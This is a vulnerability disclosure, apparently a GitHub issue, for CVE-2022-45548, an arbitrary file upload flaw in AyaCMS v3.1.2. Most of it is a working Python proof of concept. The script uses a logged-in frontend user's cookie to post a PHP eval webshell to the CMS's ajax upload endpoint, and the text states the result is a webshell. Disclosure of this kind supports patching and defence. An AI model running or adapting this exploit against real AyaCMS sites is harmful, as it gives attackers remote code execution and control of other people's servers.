Headline
CVE-2022-45548: AyaCMS v3.1.2 has a Frontend Arbitrary File Upload Vulnerability · Issue #4 · loadream/AyaCMS
AyaCMS v3.1.2 has an Arbitrary File Upload vulnerability.
Register a frontend user and login to get the cookie, then upload our webshell.
import requests
files = {
'Filedata': ('shell.php', '<?php @eval($_POST[2333]);')
}
cookies = {
'aya_auth': 'UmMGDhI2GypYeUw1XApRO1dkEiEFN1UwTCcGOhZxVjxbOwRhCWwTf0ErTSNJLl9mRCMQcAMzXjlBLgY7DGtFKFJnBjcSJBt2WGlMc1w3',
'aya_template': 'pc'
}
url = 'http://localhost/AyaCMS/ajax.php?fun=upload_file'
r = requests.post(url=url, files=files, cookies=cookies)
print(r.text)
We will get a webshell.